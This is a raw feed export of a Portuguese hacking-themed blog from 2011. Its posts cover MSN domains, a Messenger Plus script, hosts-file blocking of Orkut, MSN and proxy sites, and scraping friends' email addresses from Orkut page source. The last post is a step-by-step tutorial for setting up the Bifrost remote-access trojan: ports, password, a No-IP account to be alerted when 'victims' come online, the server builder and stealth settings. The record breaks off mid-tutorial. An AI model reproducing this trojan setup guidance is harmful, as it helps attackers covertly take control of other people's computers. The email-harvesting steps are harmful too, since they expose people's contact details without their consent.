France - live.fr or hotmail.fr fr-FR&lt;br /&gt;
Germany - live.de or hotmail.de de-DE&lt;br /&gt;
Hong Kong - live.hk zh-cht-hk&lt;br /&gt;
Indonesia - windowslive.com en-ID&lt;br /&gt;
Ireland - live.ie en-IE&lt;br /&gt;
Italy - live.it or hotmail.it it-IT&lt;br /&gt;
Japan - live.jp or hotmail.co.jp ja-JP&lt;br /&gt;
Korea - live.co.kr ko-KR&lt;br /&gt;
Malaysia - live.com.my en-MY&lt;br /&gt;
Mexico - live.com.mx es-MX&lt;br /&gt;
Netherlands live.nl nl-NL&lt;br /&gt;
Norway - live.no nb-NO&lt;br /&gt;
Pakistan - live.com.pk registration link unavailable)&lt;br /&gt;
Peru - live.com.pe registration link unavailable)&lt;br /&gt;
Portugal - live.com.pt registration page URL in pt-PT language locale)&lt;br /&gt;
Russia - live.ru ru-RU&lt;br /&gt;
Singapore - live.com.sg en-SG&lt;br /&gt;
South Africa - live.co.za en-ZA&lt;br /&gt;
Sweden - live.se sv-SE&lt;br /&gt;
Switzerland - windowslive.com fr-CH&lt;br /&gt;
Thailand - windowslive.com th-TH&lt;br /&gt;
Turkey - windowslive.com tr-TR&lt;br /&gt;
UK - live.com.uk or hotmail.co.uk en-GB&lt;br /&gt;
USA - live.com en-US&lt;br /&gt;
USA Spanish) - live.com es-US&amp;nbsp;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-8619052599349759365?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/kSDyELMyC7QhA_iJkW-iq2qC5tY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/kSDyELMyC7QhA_iJkW-iq2qC5tY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/kSDyELMyC7QhA_iJkW-iq2qC5tY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/kSDyELMyC7QhA_iJkW-iq2qC5tY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/G894NOAuO0Q" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/8619052599349759365/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/crie-msn-com-dominios-de-outros-paises.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/8619052599349759365?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/8619052599349759365?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/G894NOAuO0Q/crie-msn-com-dominios-de-outros-paises.html" title="Crie MSN com dominios de outros Paises .!" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/crie-msn-com-dominios-de-outros-paises.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eip7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-5005411516723512418</id><published>2011-03-22T14:21:00.000-07:00</published><updated>2011-03-24T06:17:23.822-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.822-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Total de Usuarios Online no subnick do MSN .</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;span style="font-size: xx-small;"&gt;Esta funcionalidade chama-se PSM Live Status e para quem tem o programa Plus este script e fantástico! Ela adiciona em seu sub-nick do mensseger um status com o total de contactos online e offine no seu mensseger, quantas janelas estão abertas e com quem está conversando…&amp;nbsp;&lt;img alt=";)" border="0" src="http://s.wordpress.com/wp-includes/images/smilies/icon_wink.gif" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: xx-small;"&gt;&lt;img border="0" height="73" src="http://h2odeskmod.files.wordpress.com/2007/10/plus.gif?w=334&amp;amp;h=73&amp;amp;h=73" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="334" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;span style="font-size: xx-small;"&gt;Após fazer o download e ter salvo no seu PC basta clicar no arquivo que aparecerá uma janela com o nome do script, marque a opção “Eu aceito a responsabilidade da instalação de Script” e clique em importar como está na imagem abaixo em meu teste:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: xx-small;"&gt;&lt;img border="0" height="275" src="http://h2odeskmod.files.wordpress.com/2007/10/plus-live-1.jpg?w=430&amp;amp;h=275&amp;amp;h=275" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="430" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;span style="font-size: xx-small;"&gt;Feito! Agora seu mensseger terá como sub-nick! Eu já uso este script! Simplesmente fantástico.&amp;nbsp;&lt;img alt="P" border="0" src="http://h2odeskmod.wordpress.com/wp-includes/images/smilies/icon_razz.gif" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: xx-small;"&gt;&lt;img border="0" height="41" src="http://h2odeskmod.files.wordpress.com/2007/10/status.png?w=346&amp;amp;h=41&amp;amp;h=41" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="346" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: xx-small;"&gt;A pedido de varios Leitores aqui está como desabilitar o script:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: xx-small;"&gt;(clique nas imagens para ampliar)&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: xx-small;"&gt;Clique no botão indicado na imagem:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: xx-small;"&gt;&lt;a href="http://mastermod.files.wordpress.com/2007/11/des1.jpg" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;" target="_blank"&gt;&lt;img border="0" height="278" src="http://mastermod.files.wordpress.com/2007/11/des1.jpg?w=410&amp;amp;h=278" style="border-bottom-style: none; border-color: initial; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; border-width: initial;" width="410" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: xx-small;"&gt;E depois escolha a opcção “desactiva PSM Live Status” conforme indicado na imagem.&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: xx-small;"&gt;&lt;a href="http://mastermod.files.wordpress.com/2007/11/des2.jpg" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;" target="_blank"&gt;&lt;img border="0" height="231" src="http://mastermod.files.wordpress.com/2007/11/des2.jpg?w=419&amp;amp;h=231" style="border-bottom-style: none; border-color: initial; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; border-width: initial;" width="419" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-5005411516723512418?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/r2zUIZrHct58sN-PhLWCquZtx0c/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/r2zUIZrHct58sN-PhLWCquZtx0c/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/r2zUIZrHct58sN-PhLWCquZtx0c/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/r2zUIZrHct58sN-PhLWCquZtx0c/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/dirY6o3zCvg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/5005411516723512418/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/total-de-usuarios-online-no-subnick-do.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/5005411516723512418?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/5005411516723512418?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/dirY6o3zCvg/total-de-usuarios-online-no-subnick-do.html" title="Total de Usuarios Online no subnick do MSN ." /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/total-de-usuarios-online-no-subnick-do.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eip7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-2941750372422103449</id><published>2011-03-22T14:17:00.001-07:00</published><updated>2011-03-24T06:17:23.822-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.822-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Pegar email dos Amigos no Orkut . !</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Primeiramente baixe o navegador Firefox, e depois mude para a versão antiga do Orkut, logo depois siga os passos abaixo:&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;1) Clique no meu&amp;nbsp;&lt;a href="http://www.orkut.com.br/Main#ShowFriends" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;" target="_blank"&gt;"Amigos" no Orkut&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
2) Escolha visualmente o perfil que voce deseja pegar o email&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;3) Selecione com o mouse desde o Nome do Perfil até o País dela&lt;br /&gt;
&lt;br /&gt;
4) Clique com o botao direito em cima desta seleção e escolhe "Código fonte da seleção"&lt;br /&gt;
&lt;br /&gt;
5) Aperte CTRL + F e digite&amp;nbsp;&lt;strong&gt;@&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
6) Pronto! Este é o email do profile desejado&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-2941750372422103449?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/_MhPTDtozs98TmwU4ojZfLCEhLs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_MhPTDtozs98TmwU4ojZfLCEhLs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/_MhPTDtozs98TmwU4ojZfLCEhLs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_MhPTDtozs98TmwU4ojZfLCEhLs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/OebgH3Y16fI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/2941750372422103449/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/pegar-email-dos-amigos-no-orkut.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/2941750372422103449?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/2941750372422103449?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/OebgH3Y16fI/pegar-email-dos-amigos-no-orkut.html" title="Pegar email dos Amigos no Orkut . !" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/pegar-email-dos-amigos-no-orkut.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eip7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-7542986780241286290</id><published>2011-03-22T14:15:00.001-07:00</published><updated>2011-03-24T06:17:23.822-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.822-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Bloquear Orkut e MSN através do arquivo Hosts</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;O roteador ofereceu-me recursos pobríssimos de bloqueio… Só pra você saber, o modelo dele é um&amp;nbsp;&lt;a href="http://www.submarino.com.br/software_productdetails.asp?Query=ProductPage&amp;amp;ProdTypeId=10&amp;amp;ProdId=1362855&amp;amp;franq=102414" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;Linksys Compact&lt;/a&gt;. Funciona muito bem para o básico, mas, opte por outro modelo caso você deseje ter maior controle sobre serviços secundários, como bloqueio de portas e etc. Bem, pode ser que eu seja burro também e não achei uma forma fácil de saciar a minha necessidade… fica aí a dica, anyway&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Após dar uma boa pescada através do Google Lake pra saber o que há de mais moderno por aí em questão de bloqueio de sites e softwares, achei alguns artigos interessantes que apontavam o próprio arquivo “hosts” do Windows como solução para o bloqueio dos nomes de domínios relacionados ao assunto a ser bloqueado - no meu caso, orkut e msn.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Este arquivo é tão simples como uma pedra. Você coloca o IP de destino que o host tal.com vai alcançar quando for requisitado por qualquer aplicação - o que inclui Instant Messengers, Web Browsers e outros clients como o AudioScrobbler do Last.fm. Por exemplo:&lt;/div&gt;&lt;pre&gt;127.0.0.1 gateway.messenger.hotmail.com&lt;/pre&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;…desta forma, impede-se o MSN Messenger de conseguir fazer o login na rede. Talvez, você tenha que colocar até alguns outros redirecionamentos de hosts, como:&lt;/div&gt;&lt;pre&gt;127.0.0.1 gateway.messenger.hotmail.com
127.0.0.1 gtwy.messenger.hotmail.com
127.0.0.1 messenger.hotmail.com
127.0.0.1 svcs.microsoft.com&lt;/pre&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;E por aí vai… Repete-se o mesmo procedimento para Orkut, Web-messengers e Proxy Tunnels.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Para fazer isso funcionar, siga estes passos:&lt;/div&gt;&lt;ol&gt;&lt;li style="line-height: 18px; margin-bottom: 5px; padding-left: 0px; padding-top: 0px;"&gt;Abra com o notepad o arquivo HOSTS (sem extensão mesmo) que está no diretório \WINDOWS\system32\drivers\etc&lt;/li&gt;
&lt;li style="line-height: 18px; margin-bottom: 5px; padding-left: 0px; padding-top: 0px;"&gt;Faça uma cópia de Backup do mesmo em Save As…&lt;/li&gt;
&lt;li style="line-height: 18px; margin-bottom: 5px; padding-left: 0px; padding-top: 0px;"&gt;Cole, no original, toda a lista que te interessar a seguir:&lt;/li&gt;
&lt;/ol&gt;&lt;pre&gt;# orkut
127.0.0.1 orkut.com
127.0.0.1 www.orkut.com
127.0.0.1 images.orkut.com
127.0.0.1 www.powerscrap.com
127.0.0.1 powerscrap.com
127.0.0.1 rss.powerscrap.com
127.0.0.1 www.ocurioso.com
127.0.0.1 ocurioso.com
127.0.0.1 orkut.etc.br

# messenger
127.0.0.1 gateway.messenger.hotmail.com
127.0.0.1 www.msn.com
127.0.0.1 msn.com
127.0.0.1 gateway.messenger.hotmail.com
127.0.0.1 gtwy.messenger.hotmail.com
127.0.0.1 messenger.hotmail.com
127.0.0.1 svcs.microsoft.com
127.0.0.1 webmessenger.msn.com
127.0.0.1 kickme.to/msnmessenger2go
127.0.0.1 iloveim.com
127.0.0.1 e-messenger.net
127.0.0.1 atlanta.e-messenger.net
127.0.0.1 boston.e-messenger.net
127.0.0.1 msn2go.com
127.0.0.1 msn2go.com.br
127.0.0.1 piglet-im.com
127.0.0.1 webmsn.net
127.0.0.1 e-messenger.cl
127.0.0.1 passaport.netport.net
127.0.0.1 wwwl.meebo.com
127.0.0.1 meebo.com
127.0.0.1 www.meebo.com
127.0.0.1 ebuddy.com
127.0.0.1 www.ebuddy.com
127.0.0.1 www.messemgerfx.com
127.0.0.1 messemgerfx.com
127.0.0.1 69.36.226.110
127.0.0.1 69.36.226.150
127.0.0.1 69.36.226.175
127.0.0.1 69.36.226.189
127.0.0.1 64.92.172.107
127.0.0.1 216.129.112.85
127.0.0.1 216.129.112.86
127.0.0.1 216.129.112.116
127.0.0.1 www.meebo.com.br
127.0.0.1 meebo.com.br
127.0.0.1 chicago.e-messenger.net
127.0.0.1 vicotria.e-messenger.net
127.0.0.1 msn2go.com.br

# web proxies
127.0.0.1 calculatepie.com
127.0.0.1 www.englishtunnel.com
127.0.0.1 englishtunnel.com
127.0.0.1 www.safehazard.com
127.0.0.1 safehazard.com
127.0.0.1 www.saferforwork.net
127.0.0.1 saferforwork.net
127.0.0.1 www.browseatwork1.com
127.0.0.1 browseatwork1.com
127.0.0.1 planetdangerous.com
127.0.0.1 www.atunnel.com
127.0.0.1 atunnel.com
127.0.0.1 www.btunnel.com
127.0.0.1 btunnel.com
127.0.0.1 www.ctunnel.com
127.0.0.1 ctunnel.com
127.0.0.1 www.dtunnel.com
127.0.0.1 dtunnel.com
127.0.0.1 www.vtunnel.com
127.0.0.1 vtunnel.com
127.0.0.1 www.vttunnel.com
127.0.0.1 vttunnel.com
127.0.0.1 proxify.com
127.0.0.1 proxyforpeace.com
127.0.0.1 weboogle.info
127.0.0.1 beatfiltering.com
127.0.0.1 choosethisproxy.com
127.0.0.1 pagewash.com
127.0.0.1 proxyhog.info
127.0.0.1 secretip.com
127.0.0.1 webunlocker.com
127.0.0.1 pickthisproxy.com
127.0.0.1 www.polysolve.com
127.0.0.1 polysolve.com
127.0.0.1 www.vpntunnel.net
127.0.0.1 vpntunnel.net
127.0.0.1 www.geotunnel.com
127.0.0.1 geotunnel.com
127.0.0.1 backfox.com
127.0.0.1 www.calculatepie.com
127.0.0.1 calculatepie.com
127.0.0.1 www.mathtunnel.com
127.0.0.1 mathtunnel.com&lt;/pre&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Repita o processo para os domínios que você deseja bloquear adicionalmente. Este procedimento não impede ninguém de reverter o processo facilmente, mas, com certeza, vai deixar os leigos desanimados. Só funciona na mesma máquina cujo hosts foi editado. Caso tenha algum problema, volte o seu backup!&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Espero que seja de grande ajuda para as pessoas que têm crianças pequenas e nenhum saco pra configurar milhares de softwares/roteadores complicados&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-7542986780241286290?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/vIX0pvkr1_KQEz5vJYd0fOvNWA8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vIX0pvkr1_KQEz5vJYd0fOvNWA8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/vIX0pvkr1_KQEz5vJYd0fOvNWA8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vIX0pvkr1_KQEz5vJYd0fOvNWA8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/-8AK5TVdzOI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/7542986780241286290/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/bloquear-orkut-e-msn-atraves-do-arquivo.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/7542986780241286290?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/7542986780241286290?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/-8AK5TVdzOI/bloquear-orkut-e-msn-atraves-do-arquivo.html" title="Bloquear Orkut e MSN através do arquivo Hosts" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/bloquear-orkut-e-msn-atraves-do-arquivo.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eip7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-3871752954575756155</id><published>2011-03-22T14:12:00.001-07:00</published><updated>2011-03-24T06:17:23.822-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.822-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Tutorial Bifrost Trojan</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;Este tutorial tem como objetivo ajudar quem quer usar o Bifrost Trojan, aqui vc não irá se aprofundar em todas as opções e detalhes do programa.&lt;br /&gt;
&lt;br /&gt;
TELA INICIAL DO BIFROST TROJAN&lt;br /&gt;
&lt;br /&gt;
Aqui se encontra a lista das vítimas que estão on line, como ainda não tem ngm em sua lista ela estará vazia... vc deve clicar em Settings...&lt;br /&gt;
&lt;br /&gt;
&lt;img height="288" src="http://img206.imageshack.us/img206/4198/bifrost1pt3.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="582" /&gt;&lt;br /&gt;
&lt;br /&gt;
1- Settings&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img src="http://img145.imageshack.us/img145/3349/bifrost6nz3.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Portas 81, 200, 123 – são as portas com as quais voce irá se conectar&lt;br /&gt;
Password – coloque uma senha, no nosso exemplo será “senha”&lt;br /&gt;
&lt;br /&gt;
O resto deixe como está, são as configurações padrões, como por exemplo “Msn style notification” será o modo que vc saberá que as suas vítimas estão on line, como no msn quando algum contato fica on line.&lt;br /&gt;
&lt;br /&gt;
2- Builder (Para fazer o seu server)&lt;br /&gt;
Aqui a parte mais importante:&lt;br /&gt;
&lt;br /&gt;
a) Connection&lt;br /&gt;
&lt;br /&gt;
&lt;img src="http://img231.imageshack.us/img231/9908/bifrost2wj8.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;br /&gt;
&lt;br /&gt;
Voce deve ter uma conta no NO-IP e colocar o seu login aqui para receber suas notificações de vítimas on line.&lt;br /&gt;
A senha escolhida no passo anterior deve ser colocada no espaço referente.&lt;br /&gt;
&lt;br /&gt;
b) Installation&lt;br /&gt;
Deixe como está...&lt;br /&gt;
&lt;img src="http://img265.imageshack.us/img265/7383/bifrost3am4.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;a href="http://img265.imageshack.us/my.php?image=bifrost3am4.jpg" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;" target="_blank"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
c) Stealth&lt;br /&gt;
Deixe como está...&lt;br /&gt;
&lt;br /&gt;
&lt;img src="http://img265.imageshack.us/img265/3616/bifrost4ha7.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /&gt;&lt;br /&gt;
&lt;br /&gt;
